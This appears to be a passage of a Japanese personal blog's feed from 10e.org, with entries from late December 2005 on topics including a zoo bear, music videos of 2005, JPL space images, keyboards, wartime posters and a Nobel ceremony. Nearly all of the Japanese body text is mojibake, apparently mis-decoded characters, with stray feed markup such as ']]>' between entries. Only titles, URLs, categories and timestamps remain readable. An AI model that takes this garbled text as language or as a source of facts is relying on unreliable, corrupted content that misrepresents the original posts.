    -CO‚¾‚ֶ‚±‚ּFlickr‚ֱ‚ִƒ„ƒc‚ֽ‹\ƒ†[ƒU[‚ׂ¢‚י‚ס‚ֵ‚·‚זƒlBƒGƒ‹ƒGƒ‹‚א‚ז‚­©‚י‚µB

    - -

    ƒCƒ^ƒƒA‚ֵƒ~ƒCƒ‰‚ּפ‚¢A‚Vl‚×€–S
    -ƒGƒbƒcƒB‚ֱ‚ִ‚ּ‚ֽA‚ ‚ּƒAƒCƒXƒ}ƒ“‚ֶ‚µ‚ִ’m‚ח‚ך‚יƒ~ƒCƒ‰‚³‚ס‚ֵ‚·ƒlB
    -ƒcƒ^ƒ“ƒJ[ƒƒ“‚ּפ‚¢‚ּ˜b‚א‚ ‚י‚µA‚ג‚ֱ‚ֿ‚טuפ‚¢v‚ֱ‚ִ‚ּ‚ֽ–{“–‚ֹ‚ ‚י‚ס‚ֵ‚·‚ֱ‚ִ‚־B

    - -

    ³’¼A©•ּׂƒTƒCƒg‚ּu‚¨³d—lv‚ּƒ‚ƒ“‚ֱ‚ִ‚ּ‚ֽ‰½‚ֹ‚א—pˆ׃‚µ‚ִ‚ָ‚¢‚ּ‚ֵ¢‚ֱ‚ִ‚¢‚י‚P‚O־‚ֵ‚·B

    ]]>
    -¬¾“ת‹L -elel -2005-12-31T04:17:54+09:00 -
    - -ƒcƒLƒmƒƒOƒ}‚¿‚ב‚ס -http://10e.org/mt/archives/200512/310359.php -34305 B

    - -

    ‚±‚ך‚ֽƒ}ƒW‚ֱ‚·‚©[I
    -’†‘‚ּ’•ַ‚ֱ‚ִƒgƒRƒ‚ֹ‚ ‚י“®•¨‰€‚ֵAƒcƒLƒmƒƒOƒ}‚ּq‹‚×^‚ּ‚ז‚₪‚ֹ—ˆ‚½l‚ֹ–ל״‚נ”„‚ֱ‚ִ‚י‚»‚₪‚ֵ‚·B‚¨‹q‚³‚ס‚ֽ–ל״‚נ‚P³‚ֵ”ƒ‚ֱ‚ִA‚»‚ּ”ƒ‚ֱ‚½–ל״‚נ‚±‚ּƒcƒLƒmƒƒOƒ}‚ֹ‚ ‚°‚יƒRƒg‚×o—ˆ‚י‚»‚₪‚ֵ‚·B
    -‚µ‚©‚אA–ל״‚נ‚א‚ח‚ֱ‚½ד‚ֽ‚±‚ּƒcƒLƒmƒƒOƒ}‚¿‚ב‚ס‚ֽ´׃‚ּ‹C‚¿‚ֵ‚¨‹q‚³‚ס‚ּט‚ֶ‚©‚נ‚ָ‚‚ִ‚­‚ך‚י‚ח‚µ‚¢B

    - -

    ’†‘ƒXƒQ[I
    -‚±‚ּ“®•¨‰€‚×o‰c‚׉־‚ּװ‚ֵA‚»‚ּ‚½‚‚ֹ“®•¨‰€‚ּl‚ׂ±‚ּ|‚נ•ׂ‚o‚µ‚ִ‚±‚ּƒcƒLƒmƒƒOƒ}‚ֽP—‚³‚ך‚ִ‚¨‚ט‚‚¾—c‚¢‚ּ‚ֵlװ‚נP‚ֱ‚½‚ט‚·‚י‚±‚ֶ‚ֽ‚ָ‚¢‚»‚₪‚ֵ‚·B–³˜_‚¨‹q‚³‚ס‚ֹ‚ֽ‘וl‹C‚ֵA“®•¨‰€‚ֹ—ˆ‚יl‚א‘‚¦‚½‚»‚₪‚ֵ‚·B
    -ƒGƒ‹ƒGƒ‹‚ּƒiƒƒiƒ‚µ‚ִ‚א‚ח‚¢‚ִ[IIII

    ]]>
    -Animal -elel -2005-12-31T03:59:19+09:00 -
    - -‚P‚X‚X‚Q”N‚ּƒLƒ“ƒLƒ“‚ֶ‚¨‚ֱ‚ֿ‚¢ -http://10e.org/mt/archives/200512/310327.php -32111 B
    -‚P‚X‚X‚Q”N‚ּƒLƒ“ƒLƒ“‚ֶ‚¨‚ֱ‚ֿ‚¢

    - -

    ƒLƒ“ƒLƒ“‚ֶ‚‚¿‚ב‚ ‚«‚×ב‚¢EEEB
    -‚ַ‚₪‚ג‚ח‚P‚X‚X‚Q”N‚ּ‚ַ‚ֱ‚©‚ּƒeƒƒr”װ‘g‚ח‚µ‚¢B‚¨‚ֱ‚ֿ‚¢o‚µ‚ֹ‚ָ‚ֱ‚¿‚ב‚ֱ‚½‚ט‚µ‚ִ‚י‚ס‚ֵ‚·‚¯‚ַA‚P‚X‚X‚Q”N“–‚ֵ‚א‚±‚ס‚ָ•ת‘—‚ֱ‚ִ‚ ‚ֱ‚½‚ֱ‚¯H‚µ‚©‚אƒ^ƒbƒ`‚ֶ‚©‚µ‚ִ‚י‚µ[B
    -‚µ‚ֱ‚©‚µu¢E‚ׁ‚ֱ‚­‚ט‘וv‚ֱ‚ִƒxƒ^‚ָ”װ‘g–¼‚¾‚ָ‚`B

    - -

    ּ‚ֽ[–י”װ‘g‚ֶ‚©‚¾‚ֶ‹\ƒAƒ‚ָ‚ּ‚א‚ ‚ֱ‚½‚ז‚₪‚ָ‹C‚א‚µ‚‚·‚¯‚ַƒlB

    - -

    ‚¨‚‚¯
    -ƒAƒNƒƒoƒbƒg”עs‚ּ–­‹Z
    -ƒXƒQƒF[B

    ]]>
    -VIDEO -elel -2005-12-31T03:27:24+09:00 -
    - -Top 50 Music Videos Of 2005 -http://10e.org/mt/archives/200512/310306.php -Top 50 Music Videos Of 2005

    - -

    ‚±‚¿‚ח‚ּƒuƒƒO‚³‚ס‚ֹ‚ז‚י‚¢‚כ‚ס‚ָƒ~ƒ…[ƒWƒbƒNƒrƒfƒI‚ֶ‚©‚ּ‚T‚O‘I‚ֵ‚·B
    -‚ג‚ֱ‚ֿ‚טˆךˆ‚ֽuRubber Johnnyv‚ָ‚ּƒl`‚ֱ‚ֶ‚©v‚¢‚ֲ‚ֲA‘¼‚ֹ‚א‚¢‚כ‚¢‚כ‚ ‚י‚ס‚ֵ©‚י‚ֶ–”’‚¢‚זB

    - -

    ‚±‚ּRubber Johnny‚ֱ‚ִ‚ּ‚ֽƒNƒƒXEƒJƒjƒ“ƒKƒ€‚ֱ‚ִl‚×§ל‚µ‚½ƒ‚ƒ“‚ֵA‚±‚₪‚¢‚₪EG‚ֵ‚ֽ‹Sֻ‚ֶ‚µ‚ִ—L–¼‚ָl‚ָ‚ס‚¾‚»‚₪‚ֵ‚·B‚[©‚ך‚־‚ם‚©‚י‚זB

    - -

    ‘¼‚ּƒrƒfƒI‚ֽAƒGƒ‹ƒGƒ‹‚×’m‚ֱ‚ִ‚י‚ּ‚¾‚ֶGorillaz‚ֶ‚©‚®‚ח‚¢‚©‚ָ‚`EEEB
    -ƒCƒ“ƒ^[ƒlƒbƒg‚ֵ‰ּ‚נ”zM‚·‚י‚ֶ‚ָ‚י‚ֶA‚ג‚ֱ‚ֿ‚ט‰ּ‚¾‚¯‚ֵ‚ֽ‚ָ‚­‚»‚ּ‰f‘‚ֱ‚ִ‚ּ‚א‹C‡‚¢“‚ך‚ִל‚ֱ‚ִ—~‚µ‚¢‚ֵ‚·‚זƒlB

    ]]>
    -cool -elel -2005-12-31T03:06:07+09:00 -
    - -The Year in Images JPL 2005 -http://10e.org/mt/archives/200512/310232.php -44825 B
    -The Year in Images JPL 2005

    - -

    uJPLv‚ֱ‚ִ‚ּ‚ֽAƒAƒƒƒJ‚ּƒJƒƒtƒHƒ‹ƒjƒA‚ֹ‚ ‚י‚¢‚ם‚ה‚יuƒWƒFƒbƒg„i₪‹†iJet Propulsion Laboratoryjv‚ֱ‚ִ₪‹†‚ֵ‚m‚`‚r‚`‚ּ₪‹†‚ּˆך‚ֲ‚‚½‚¢‚ָƒ‚ƒ“‚¾‚ֶv‚¢‚‚·B
    -¡”N‚ּ‚¢‚כ‚ס‚ָ‰F’ˆײ˜A^‚ּ‚e‚k‚`‚r‚gƒXƒ‰ƒCƒhƒVƒ‡[‚ֵ‚·ƒlB

    - -

    ¢E‚ּ‰A–d‚ֹ‚ז‚ט‚t‚e‚n‚ֶ‚©‰F’ˆl‚ֶ‚©‚ֽo‚ִ‚±‚ָ‚¢‚ס‚ֵ‚·‚¯‚ַA‚»‚ך‚ֵ‚א‘s‘ו‚ָƒEƒ`ƒ…ƒE‚נ©‚י‚±‚ֶ‚×o—ˆ‚י‚©‚ֶB
    -—ˆ”N‚ֽ‘זOם‹‘˜‹צ‚ּ”N‚ֹ‚ָ‚י‚ֶ‚¢‚¢‚ָ‚`EEEB

    ]]>
    -FLASH -elel -2005-12-31T02:32:19+09:00 -
    - -Jordan‚³‚ס‚ּ‚Q‚O‚O‚U”NƒJƒƒ“ƒ_[ -http://10e.org/mt/archives/200512/310116.php -28225 B
    -Jordan‚³‚ס‚ּ‚Q‚O‚O‚U”NƒJƒƒ“ƒ_[

    - -

    ‚¢‚ג‚[‚א‚₪‘‚­‚±‚ֶ‚ׂ ‚ס‚‚ט–³‚­‚ִƒlB
    -‚«‚ֱ‚ֶƒCƒMƒƒX‚©‚ח—ˆ‚ִ‚י‚©‚א‚µ‚ך‚ָ‚¢l‚׈ךl‚­‚ח‚¢ƒEƒ`‚ּƒTƒCƒg‚ֹ‚א‚¢‚י‚ס‚¶‚ב‚ָ‚¢‚©EEEƒbƒev‚ֱ‚ִ`B
    -ƒWƒ‡[ƒ_ƒ“‚³‚ס‚±‚ֶAƒPƒCƒgEƒvƒ‰ƒCƒX‚³‚ס‚ּ—ˆ”N‚ּƒJƒƒ“ƒ_[‚ח‚µ‚¢B‚±‚ּl‚ֽ‚ֲ‚¢ֵ‹u‚¨‚ֱ‚ֿ‚¢‚נ¬‚³‚­‚µ‚½v‚ֱ‚ִƒjƒ…[ƒX‚×—¬‚ך‚½ƒƒP‚ֵ‚·‚×Am‚©‚ֹ‚±‚₪‚ג‚ֱ‚ִ©‚ִ‚‚י‚ֶּ‚ז‚ט‚אƒIƒbƒpƒC‚׬‚³‚­‚ָ‚ֱ‚ִ‚י‚ז‚₪‚ָ‹C‚ׂµ‚ָ‚¢ƒƒP‚ֵ‚א‚ָ‚¢B
    -‚[‚»‚ך‚ֵ‚א‹“‚ֹ‚ֽ•ֿ‚ם‚ט‚ָ‚¢‚ז‚₪‚ָ‹C‚א‚·‚י‚ס‚ֵ‚·‚¯‚ַƒli־

    ]]>
    -Babe -elel -2005-12-31T01:16:01+09:00 -
    - -‘ז“ס¢E‘ום‚ּƒ|ƒXƒ^[ -http://10e.org/mt/archives/200512/310037.php -44786 B
    -‘ז“ס¢E‘ום‚ּƒ|ƒXƒ^[

    - -

    ‚[‚¾‚©‚ח‰½‰½‚¾HI‚ֱ‚ִ¾‚ם‚ך‚ִ‚א¢‚י‚ס‚ֵ‚·‚¯‚ַAƒAƒƒƒJ‚ֵ‘ז“ס¢E‘ום“–‚ֹל¬‚³‚ך‚½ƒ|ƒXƒ^[‚ּ”X‚ֵ‚·ƒlB‚»‚ּ“–‚ּ¢Eֿ‚‚½‚¢‚ּ‚׋\o‚ִ‚ִA—נj“I‘—¿‚ֶ‚µ‚ִ‚ֽ‚ָ‚©‚ָ‚©–”’‚¢B
    -מ–{“I‚ֹ‚ֽם‘ˆ‚ּƒ|ƒXƒ^[‚¾‚¯‚ ‚ֱ‚ִA“א—e‚ּ•‚ֽƒqƒl‚ֱ‚ִ‚ ‚יƒ‚ƒm‚ֽ­‚ָ‚¢‚ֵ‚·ƒlB‚»‚ּ‚‚ס‚’¼‚ָ“א—e‚ּƒ‚ƒm‚ב½‚¢‚ז‚₪‚ֹ´‚¶‚‚·BƒEƒ`‚ּƒTƒCƒg‚ֵƒTƒ€ƒlƒCƒ‹‚ֹ‚ָ‚ֱ‚ִ‚י‚ּ‚ָ‚ס‚ִ‚©‚ָ‚ט’¥“I‚ָˆך–‡‚ָ‚ס‚¶‚ב‚ָ‚¢‚©‚ֶB

    ]]>
    -World -elel -2005-12-31T00:37:27+09:00 -
    - -ƒlƒRƒp[ƒ“ƒ`I -http://10e.org/mt/archives/200512/300412.php -26364 B
    -ƒNƒƒbƒN‚·‚י‚ֶ‚ֵ‚ֱ‚©‚­‚ָ‚ט‚‚·

    - -

    ‚»‚ך‚¢‚¯[ƒlƒRƒp[ƒ“ƒ`I

    - -

    ּ‚ֱ‚©‚ח‹^–ג‚ֵ‚µ‚ו‚₪‚ָׂ‚©‚ֱ‚½‚±‚ֶB
    -ƒAƒ“ƒpƒ“ƒ}ƒ“‚ּƒI[ƒvƒjƒ“ƒOƒe[ƒ}‚ֱ‚ִ‚ ‚י‚¶‚ב‚ָ‚¢‚ֵ‚·‚©[
    -u‚»‚¨‚³`‚¨‚»‚ך‚ָ‚¢‚ֵ`‚‚ס‚ָ‚ּ‚½‚‚ֹ`פˆ₪‚ֶ—E‹C‚¾‚¯‚×—F’B‚³‚`פv‚ֱ‚ִƒ„ƒcB‘¼‚ּ—F’B‚אל‚כ‚₪‚זEEEB
    -‚ֱ‚ֶAƒAƒ“ƒpƒ“ƒ}ƒ“‚ֹ‚¯‚ס‚©‚נ”„‚ֱ‚½‚‚½ƒƒP‚ֵ‚·‚×A‚»‚א‚»‚אu–l‚ּ“ׂנH‚׳‚ָ‚זv‚ֱ‚ִƒtƒ[ƒY‚ֽ‚P‚O־“I‚ֹ‚ֽ”סם‚ֹ¨ˆב‚¢‚נ‚µ‚ִ‚µ‚‚¢‚»‚₪‚ָƒtƒ[ƒY‚ֵ‚·B

    - -

    ƒƒƒ“ƒiƒ“ƒp‚¿‚ב‚ס
    -‚ָ‚ס‚ֵƒƒƒ“ƒpƒ“ƒi‚¿‚ב‚ס‚¾‚¯uֵד‚ּƒiv‚ֲׂ‚­‚ּ‚©H‚ֱ‚ִ‚ּ‚א‹^–ג‚ּˆך‚ֲ‚¾‚ֱ‚½‚ט‚µ‚‚·B•v‚ֽƒhƒiƒ‹ƒhƒ_ƒbƒN‚¾‚ז[ƒƒƒƒƒƒƒ“ƒp[ƒ“ƒ`I
    -‚ז‚­‚ז‚­l‚¦‚י‚ֶƒXƒSƒCƒtƒ[ƒY‚ָ‚ּ‚ֵ‚·‚×A‚»‚±‚ׂג‚ָ‚¹‚½‚©‚µ‚³‚ס‚ּƒXƒSƒCƒgƒRƒ‚ֹˆב‚¢‚ָ‚¢B

    - -

    ‚[ƒGƒ‹ƒGƒ‹‚ֽמ–{“I‚ֹƒAƒ“ƒpƒ“ƒ}ƒ“‚ֱ‚ִ‘וD‚«‚ָ‚ס‚ֵ‚·‚¯‚ַƒlB
    -uƒRƒƒlƒpƒ“ƒ}ƒ“v‚ֶ‚©³‹`‚ּƒq[ƒ[‚ֹ‰ֱ‚¦‚ִ—~‚µ‚¢Bƒ`ƒ‡ƒRƒRƒƒl‚ֶ‚©”ƒ‚ֱ‚ִA‚ּז’[‚‚ֵ‚¬‚ֱ‚µ‚ט‚ֶ’†g‚׋l‚‚ֱ‚ִ‚י‚ֶ‚א‚ּ‚·‚²‚¢K‚¹‚נ´‚¶‚י‚ּ‚ֽƒGƒ‹ƒGƒ‹‚¾‚¯‚ֵ‚µ‚ו‚₪‚©EEEH
    -‹t‚ֹƒPƒc‚ּ•‚µ‚©’†g‚ָׂ‚¢‚ֶlװ•sM‚ֹ׳‚ט‚»‚₪‚ָ¨‚¢‚ֵ‚·B

    - -


    -‚m‚`‚r‚`A‰־¯‚ֹ‚T‚O‚O“ת‘״v‰ז
    -‚»‚ס‚ָ‚ֹ‰־¯‚ֹ‚¢‚ִ‰½‚נ‚·‚י‚ס‚¾‚כ‚₪EEEB‰־¯l‚ֶ‚¨—F’B‚ֹ‚ָ‚יˆָO‚ֹ‚ָ‚ס‚©‚·‚י‚±‚ֶ‚ֱ‚ִ‚ ‚י‚ּH

    - -

    ƒlƒp[ƒ‹‚ּבׂ‘z­”N
    -‚±‚ּ­”N‚ֽ‰½‚ָ‚ס‚¾‚כ‚₪H¡‚‚ֵ‚ֹ‚אuƒ‚ƒm‚נH‚׳‚ָ‚¢v‚ֱ‚ִl‚ֽ‹\‚¢‚י‚ס‚ֵ‚·‚¯‚ַAu‰½‚אˆש‚‚ָ‚¢v‚ֱ‚ִ‚ּ‚ֽƒzƒ“ƒg‚ֹ€‚ס‚¶‚ב‚₪‚©‚חƒlB‹L–‚ֹ‚ז‚י‚ֶ–י‚ֹ‚ָ‚י‚ֶƒJ[ƒeƒ“‚×|‚¯‚ח‚ך‚י‚ח‚µ‚¢‚¯‚ַA‚»‚ּװ‚ֹˆש‚H‚¢‚µ‚ִ‚י‰ֲ”\«‚א‚ ‚י‚ֱ‚ִ¾‚₪‚ס‚ֵ‚·‚×EEEB
    -‚U”Nװ‚אבׂ‘z‚נ‘±‚¯‚י—\’ט‚ח‚µ‚¢‚ֵ‚·‚¯‚ַA‚ָ‚ס‚©‚¢‚¢‚±‚ֶ‚ׂ ‚י‚ּ‚©‚ָH

    - -

    ‘­¢װ‚ֹ‰˜‚³‚ך‚‚­‚ֱ‚ִ‚¢‚י—c—‚ֹ‚ֽ‚ז‚­‚ם‚©‚ט‚‚¹‚סEEEB

    ]]>
    -¬¾“ת‹L -elel -2005-12-30T04:12:24+09:00 -
    - -’EQWERTYƒL[ƒ{[ƒh -http://10e.org/mt/archives/200512/300333.php -27735 B
    -’EQWERTYƒL[ƒ{[ƒh

    - -

    “ת–{ך‚ּ‹L–‚׃RƒR‚ֹ‚ ‚י‚זB
    -‚²‚ח‚ס‚ּ‚ז‚₪‚ֹ‚`‚a‚b‡‚ֹ•ְ‚ס‚¾ƒL[ƒ{[ƒhB¡‚ ‚י•’‚ּ”z—ס‚ּƒL[ƒ{[ƒh‚ֽu‚ם‚´‚ֶ‘ֵ‚¿‚ֳ‚ח‚¢”z—ס‚ֹ‚ָ‚ֱ‚ִ‚יv‚ֶ‚©‚ֱ‚ִ‚ּ‚ֽ—L–¼‚ָ˜b‚ֵ‚·‚×A‚[‚א‚₪ƒ^ƒCƒvƒ‰ƒCƒ^[‚ּ‘ד‚ֵ‚ֽ‚ָ‚¢‚ּ‚ֵm‚©‚ֹV‚µ‚¢”z—ס‚ֶ‚©‚נl‚¦‚יl‚ׂ¢‚ִ‚א‚¨‚©‚µ‚­‚ֽ‚ָ‚¢‚©‚ָHI
    -‚א‚ֱ‚ֶ‚אAƒGƒ‹ƒGƒ‹‚ֽ‚א‚₪‚±‚ּ”z—ס‚¶‚ב‚ָ‚¢‚ֶƒ_ƒ‚ֵ‚·‚¯‚ַƒlB

    - -

    m‚©ּ‚±‚ּ”z—ס‚¶‚ב‚ָ‚¢ƒL[ƒ{[ƒh‚ֱ‚ִ‚·‚ֵ‚ֹ‚ ‚ֱ‚½‚זƒlH‚ָ‚ס‚¾‚ֱ‚¯H‰½‚©‚ּƒpƒ\ƒRƒ“‚¾‚©‚ּƒL[ƒ{[ƒh‚¾‚ֱ‚½‚ז‚₪‚ָ‹L‰¯‚ׂ ‚י‚ס‚ֵ‚·‚×EEEB
    -ƒGƒ‹ƒGƒ‹‚ֽ‹\ƒL[ƒ{[ƒhƒtƒFƒ`‚ָ‚ּ‚ֵ‚·‚×A‚»‚כ‚»‚כV‚µ‚¢ƒL[ƒ{[ƒh‚×—~‚µ‚¢‚¨”N ‚ֵ‚·Bˆך‰ס‚ֵ‚¢‚¢‚©‚ח“ƒvƒ‚ּRealforce‚ֶ‚©g‚ֱ‚ִ‚‚½‚¢‚ס‚ֵ‚·‚¯‚ַAƒzƒ“ƒg‚ֹ‚»‚ס‚ָ‚ֹƒXƒeƒL‚ָƒ‚ƒ“‚ָ‚ּH‚¨’l’i‚ׂ‚¢‚זƒlBמ–{“I‚ֹƒGƒ‹ƒGƒ‹‚ֽƒƒJƒjƒJƒ‹ƒL[ƒ{[ƒhƒ}ƒjƒA‚ָ‚ּ‚ֵAƒyƒjƒƒƒyƒjƒƒ‚ָ‚יƒL[ƒ{[ƒh‚ֽ‚ ‚ס‚‚טD‚«‚¶‚ב‚ָ‚¢‚ס‚ֵ‚·‚¯‚ַƒlB‚T‚T‚V‚U|‚O‚O‚Q‚ֶ‚©‚אg‚ֱ‚ִ‚‚½‚¢B
    -‚½‚¾Aמ–{“I‚ֹƒpƒ\ƒRƒ“ƒfƒXƒN‚׋·‚¢‚ּ‚ֵָƒXƒy[ƒXƒL[ƒ{[ƒh‚¶‚ב‚ָ‚¢‚ֶ‚¨’ƒ‚ּƒ}ƒOƒJƒbƒv‚נ’u‚­‚ֶ‚±‚כ‚·‚ח‚ָ‚¢‚ס‚ֵ‚·‚¯‚ַƒlB‚ָ‚ּ‚ֵ¡‚ֽFilco‚ּּ‚ּƒ„ƒcg‚ֱ‚ִ‚½‚טBƒtƒ‹ƒL[ƒ{[ƒh‚¾‚¯‚ַך‚נז‚ח‚ָ‚¢‚ּ‚ׂ¢‚¢´‚¶‚ָ‚ּ‚ֵ‚·B‚g‚g‚j‚ֶ‚©‚אƒJƒƒCƒNg‚ֱ‚ִ‚‚½‚¢ƒƒP‚ֵ‚·‚×Aƒeƒ“ƒL[‚ָׂ‚¢‚ֶז‚ֱ‚ִ‚א‹ך‚µ‚‚»‚₪‚ָ—\´B

    - -

    ‚ ‚ֶA‚·‚®‚ֹƒL[ƒ{[ƒh‚׃lƒR‚ּ–ׁ‚¾‚ח‚¯‚ֹ‚ָ‚י‚ּ‚ֵ‚ ‚ס‚‚ט‚‚¢‚ּ‚נ”ƒ‚₪‚ֶ‚א‚ֱ‚½‚¢‚ָ‚¢—\´BƒJƒo[‚©‚¯‚ִg‚₪‚ּ‚ֽƒLƒ‰ƒC‚ָ‚ּB

    - -

    ‚µ‚ֱ‚©‚µA‚±‚ּƒL[ƒ{[ƒh‚ֵּ‘ו‚ּ–ג‘ט‚ֽEEEE
    -‚„‚’‚†‚”‚‡‚™‚׃‚¶‚±‚‚G—Fu
    -‚×o—ˆ‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚₪‚ֱ‚ִƒRƒg‚ֵ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©EEEB

    ]]>
    -News -elel -2005-12-30T03:33:47+09:00 -
    - -Olivier DE SAGAZAN -http://10e.org/mt/archives/200512/300319.php -18485 B
    -Olivier DE SAGAZAN

    - -

    ƒtƒ‰ƒ“ƒX‚ּƒA[ƒeƒBƒXƒg‚ּ•‚ּƒTƒCƒg‚³‚ס‚ֵ‚·B
    -מ–{“I‚ֹ¾—t‚דַ‚‚ָ‚¢‚ס‚ֵ‚·‚×Aל•i‚ּ•‚ֽ‚¢‚כ‚¢‚כ©‚י‚±‚ֶ‚×o—ˆ‚‚·‚זBlװ‚»‚ּ‚א‚ּ‚׃A[ƒg‚ֶ‚ָ‚יƒpƒtƒH[ƒ}ƒ“ƒXƒA[ƒg‚ֶ‚©‚¢‚כ‚¢‚כ‚ָם—‚ׂ ‚י‚‚½‚¢‚ֵ‚·‚×AƒGƒ‹ƒGƒ‹“I‚ֹ‚ֽsculpture‚×–”’‚¢B
    -”N‘ד‡‚ֹ•ְ‚ס‚ֵ‚¢‚י‚‚½‚¢‚ָ‚ּ‚ֵA‚ַ‚ך‚ֵ‚אD‚«‚ָ‚ּ‚נ©‚י‚ז‚כ‚µB

    - -

    ‚¿‚ו‚ֱ‚ֶƒ\ƒbƒ`n‚ּ•µˆֽ‹C‚נ‚©‚א‚µo‚µ‚ִ‚¢‚י‚ּ‚ֶׂ‚ֱ‚ִ‚א‚f‚n‚n‚cBlװ‚ּ‹¶‹C‚ּ¢EEEE‚ֶ‚©‚»‚ס‚ָƒJƒ“ƒW‚©‚ָHI

    ]]>
    -Art -elel -2005-12-30T03:19:52+09:00 -
    - -ƒXƒEƒF[ƒfƒ“‚ּƒ}ƒfƒ[ƒ“‰₪——‚Q‚O‚O‚T”Nƒm[ƒxƒ‹צ—^® -http://10e.org/mt/archives/200512/300159.php -24624 B@23043 B
    -ƒNƒƒbƒN‚·‚י‚ֶ‚ֵ‚ֱ‚©‚­‚ָ‚ט‚‚·

    - -

    ‚±‚¿‚ח‚ּ“ת–{‚¾‚ֱ‚½‚חu‰₪—‚³‚‚ּƒRƒXƒvƒHv‚ֱ‚ֶ‚©¾‚ם‚ך‚ִ‚µ‚‚¢‚»‚₪‚ָƒxƒbƒsƒ“‚³‚ס‚ֽAƒXƒEƒF[ƒfƒ“‰₪÷‚ּ–{•¨‚ּƒ}ƒfƒ[ƒ“‰₪—B
    -‚±‚ּ^‚ֽƒXƒgƒbƒNƒzƒ‹ƒ€‚ֵs‚ם‚ך‚½¡”N‚ּƒm[ƒxƒ‹‚ּצ—^®‚ּ‚ּ^‚ֵ‚·B‘¼‚ּƒJ[ƒ‹ƒOƒXƒ^ƒt‘‰₪‚ֶ‚©‚ּ^‚א‚±‚ֱ‚¿‚ֹ‚ ‚י‚ס‚ֵ‚·‚¯‚ַƒlB

    - -

    18248 B
    -ƒNƒƒbƒN‚·‚י‚ֶ‚ֵ‚ֱ‚©‚­‚ָ‚ט‚‚·
    -‚[‚»‚ך‚ֽ‚³‚ִ‚¨‚«A‚±‚ס‚ָƒxƒbƒsƒ“‚³‚ס‚נƒXƒEƒF[ƒfƒ“’j«‚ות‚ֱ‚ִ‚¨‚­ƒnƒY‚א‚ָ‚­A‚±‚¿‚ח‚ּ^‚ֽ‚Q‚O‚O‚Q”N‚ּ“¯‚¶ƒm[ƒxƒ‹צ—^®‚ּ‚ּ^B
    -^‚נ©‚י‚ֶA‚א‚₪‚»‚ך‚ֽ‚»‚ך‚ֽƒGƒ‹ƒGƒ‹‚א‚µ‚ָ‚¢‚ז‚₪‚ָƒZƒNƒV[‚ָiD‚µ‚ִ‚יƒƒP‚ֵ‚·‚×A‚±‚ּ^‚נƒXƒEƒF[ƒfƒ“‚ּ‚ֶ‚ ‚יֲlƒTƒCƒg‚׃pƒNƒb‚ִ©•ּׂƒTƒCƒg‚ֹf‚µ‚ִuSo cute, oh so hornyi‚·‚ֱ‚°‚¦ƒJƒƒCƒCI‚ֶ‚ֱ‚ִ‚אֿ‹ֹ“IIjv‚‚½‚¢‚ָ¾—t‚נ“Y‚¦‚ִ‚¢‚½‚חA‚»‚ך‚נ©‚½•ƒe‚ֵ‚א‚ ‚יƒJ[ƒ‹ƒOƒXƒ^ƒt‘‰₪‚×”]“V‚ֹƒJƒ`ƒ“‚ֶ—ˆ‚ִƒ}ƒW‚ֹ•לm‚נ‚ֲ‚©‚ֱ‚ִƒTƒCƒg‚ַּ—l‚נ’T‚µn‚‚½‚»‚₪‚ֵ‚·B
    -‹‹ַƒTƒCƒg‚ַּ—l‚ּ•‚×^‚נם‚µ‚ִA‚©‚ם‚ט‚ֹ‘‰₪‚ײ‚ּ‹נ’s‚נ‚ּ‚¹‚¿‚ב‚ֱ‚½‚ט‚µ‚½‚¯‚ַˆך—’…‚µ‚½‚‚½‚¢B

    - -

    ¡”N‚ּƒ}ƒfƒ[ƒ“‰₪—‚ּˆ‘•‚ֽ‚¿‚ו‚ֱ‚ֶ‰¸‚ג‚©‚ֹ‚ָ‚ֱ‚½´‚¶H‚א‚µ‚©‚µ‚ִƒpƒp‚ֵ‚ ‚יƒJ[ƒ‹ƒOƒXƒ^ƒt‘‰₪‚ֹ“{‚ח‚ך‚½‚ט‚µ‚½‚ּ‚©‚ָEEEH
    -‚¿‚ָ‚‚ֹƒXƒEƒF[ƒfƒ“‚ֵ‚ֽƒ}ƒfƒ[ƒ“‰₪—‚ּƒRƒ‰‚ֶ‚©‚׃lƒbƒg‚ֵ–ג‘ט‚ֹ‚ָ‚ֱ‚½‚ט‚א‚µ‚ִ‚י‚ח‚µ‚¢B‚±‚₪‚ּEl‚³‚ס‚×”‚¬ƒRƒ‰‚ֵ‚אל‚ֱ‚ִ‚י‚ס‚¶‚ב‚ָ‚¢‚ּ‚©‚ָEEEB

    - -

    ƒEƒ`‚ּƒTƒCƒg‚אƒJ[ƒ‹ƒOƒXƒ^ƒt‘‰₪‚©‚חƒ[ƒ‹‚×—ˆ‚½‚ח‚ַ‚₪‚µ‚ז‚₪‚ֶv‚ֱ‚ִ‚¢‚יƒƒP‚ֵ‚·‚×Auƒ}ƒfƒ[ƒ“‰₪—‚ֽ‚ֶ‚ֱ‚ִ‚א‚¨‚µ‚ֶ‚ג‚©‚ֵ‚·‚־‚ח‚µ‚¢—«‚ֵ‚·ƒlv‚ֱ‚ֶ‘‚¢‚ִ‚¨‚±‚₪EEEB‘½•ׂ±‚ך‚ֵƒ‚[ƒ}ƒ“ƒ^ƒCB–ג‘ט‚ֽ‘‰₪‚דת–{ך‚נ“ַ‚‚י‚ּ‚©H‚ֱ‚ִƒgƒRƒ‚ָ‚ס‚ֵ‚·‚×EEEB

    - -

    ‘¼‚ּƒ}ƒfƒ[ƒ“‰₪—‚ּ^‚ֽ‚±‚ּ•׃‚©‚ח‚ַ‚₪‚¼Bi¦ƒ^ƒuƒuƒ‰ƒEƒU‚¾‚ֶJ‚©‚ָ‚¢‚©‚א‚µ‚ך‚‚¹‚סj
    -‘¼‚ּ‰₪÷‚ּ‰₪——l‚ּ^‚א‚ ‚י‚זB

    ]]>
    -Babe -elel -2005-12-30T01:59:34+09:00 -
    - -‚¢‚ֱ‚ֿ‚¢‚¢‚ֱ‚ֿ‚¢ -http://10e.org/mt/archives/200512/300144.php -23396 B
    -‚¨‚ֱ‚ֿ‚¢‚ׂ¢‚ֱ‚ֿ‚¢

    - -

    EEEEEB
    -‚©‚א‚µ‚ך‚ָ‚¢B





    ]]>
    -Strange -elel -2005-12-30T01:44:06+09:00 -
    - -ƒTƒXƒJƒbƒ`H‚ּ^‚Q–‡ -http://10e.org/mt/archives/200512/300130.php -18903 B
    -ƒTƒXƒJƒbƒ`H‚ּ^‚Q–‡

    - -

    ‚±‚ּ^‚ֽ‚±‚¿‚ח‚ּƒTƒCƒg‚³‚ס‚ֹ“e‚³‚ך‚½ƒ‚ƒm‚ָ‚ס‚ֵ‚·‚×A‚Q–‡‚ֽ•X‚ּך‚ּ^‚ֵ‚·B
